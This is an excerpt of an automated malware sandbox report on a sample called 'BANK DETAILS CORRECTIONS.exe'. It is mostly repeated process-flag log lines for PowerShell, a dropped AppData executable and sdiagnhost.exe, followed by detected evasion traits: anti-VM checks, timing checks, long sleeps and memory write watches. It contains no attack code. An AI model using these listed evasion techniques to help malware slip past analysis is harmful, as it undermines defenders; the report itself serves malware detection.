Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: fcLfLlfpmjf.exe PID: 7212, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 1350000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 2DB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 4DB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 7FE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 8FE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 92A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: A2A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 2680000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 2880000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 26D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 73C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 83C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 8660000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 9660000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196096E rdtsc 12_2_0196096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1221 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2743 Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Window / User API: threadDelayed 1788
Source: C:\Windows\SysWOW64\sdiagnhost.exe Window / User API: threadDelayed 8184
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe API coverage: 1.4 %
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe API coverage: 0.3 %
May sleep (evasive loops) to hinder dynamic analysis
